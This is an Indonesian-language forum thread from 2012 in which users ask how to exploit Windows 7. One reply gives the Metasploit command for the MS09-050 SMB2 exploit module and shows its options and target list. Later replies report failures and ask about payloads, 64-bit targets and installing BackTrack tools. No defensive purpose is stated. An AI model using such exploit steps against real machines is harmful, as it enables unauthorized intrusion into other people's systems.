Metasploit windows 7
#1
Gimana cara exploit windows 7
udah pernah pake teknik SET = gagal
javaapplet = cuma keberuntungan
membuat payload = harus di copy lewat flash dulu
armitage = g mempan

apakah ada yang bener-ener ampuh layaknya exploit winXP :badpc:

#2
(10-06-2012, 02:07 PM)dvil Wrote: Gimana cara exploit windows 7
udah pernah pake teknik SET = gagal
javaapplet = cuma keberuntungan
membuat payload = harus di copy lewat flash dulu
armitage = g mempan

apakah ada yang bener-ener ampuh layaknya exploit winXP :badpc:

msf > use windows/smb/ms09_050_smb2_negotiate_func_index
--perintah untuk menggunakan exploit pada windows vista/7 sebelum di patch tentunya..

msf exploit(ms09_050_smb2_negotiate_func_index) > show options


Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes The target port
WAIT 180 yes The number of seconds to wait for the attack to complete.

Exploit target:

Id Name
-- ----
0 Windows Vista SP1/SP2 and Server 2008 (x86)

semoga membantu...

#3
nice mahong sayang om belum teraktivasi .. klo tidak +2 meluncur dari ane.. nice share ya
FOLLOW @DutaLinux
for more question and sharing about security and Opensource only

#4
(10-17-2012, 09:06 AM)mahong Wrote:
(10-06-2012, 02:07 PM)dvil Wrote: Gimana cara exploit windows 7
udah pernah pake teknik SET = gagal
javaapplet = cuma keberuntungan
membuat payload = harus di copy lewat flash dulu
armitage = g mempan

apakah ada yang bener-ener ampuh layaknya exploit winXP :badpc:

msf > use windows/smb/ms09_050_smb2_negotiate_func_index
--perintah untuk menggunakan exploit pada windows vista/7 sebelum di patch tentunya..

msf exploit(ms09_050_smb2_negotiate_func_index) > show options


Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes The target port
WAIT 180 yes The number of seconds to wait for the attack to complete.

Exploit target:

Id Name
-- ----
0 Windows Vista SP1/SP2 and Server 2008 (x86)

semoga membantu...

lugas om bantuannya Smile
aktivasi dong om Idnya Smile
Spoiler! :
<<Back|Track
☆‍‍‍‍☆‍‍‍‍☆‍‍‍‍☆☆


#5
Kok gak berhasil langkah di atas?
Backtrack
Kisah tentang kita dan Linux

#6
(10-18-2012, 05:21 PM)Backtrack Dragon Wrote: Kok gak berhasil langkah di atas?

maaf anda menggunakan dengan payload apa???

thxs..

#7
kyknya ane pernah coba deh...
tpi gagal juga

#8
Question 
om kalau sudah instal ubuntu mau dapatin aplikasi backtrack gimana?
maklum pemula...

#9
tambahin repo backtrack d ubuntu nya om...

#10
(10-17-2012, 09:06 AM)mahong Wrote:
(10-06-2012, 02:07 PM)dvil Wrote: Gimana cara exploit windows 7
udah pernah pake teknik SET = gagal
javaapplet = cuma keberuntungan
membuat payload = harus di copy lewat flash dulu
armitage = g mempan

apakah ada yang bener-ener ampuh layaknya exploit winXP :badpc:

msf > use windows/smb/ms09_050_smb2_negotiate_func_index
--perintah untuk menggunakan exploit pada windows vista/7 sebelum di patch tentunya..

msf exploit(ms09_050_smb2_negotiate_func_index) > show options


Module options:

Name Current Setting Required Description
---- --------------- -------- -----------
RHOST yes The target address
RPORT 445 yes The target port
WAIT 180 yes The number of seconds to wait for the attack to complete.

Exploit target:

Id Name
-- ----
0 Windows Vista SP1/SP2 and Server 2008 (x86)

semoga membantu...

mohon maap sebelumnya mas
ini berlaku untuk di 32 bit ya??
g bisa di gunakan untuk Windows Vista SP1/SP2 and Server 2008 (x64) / 64bit ya mas,..





Users browsing this thread: 1 Guest(s)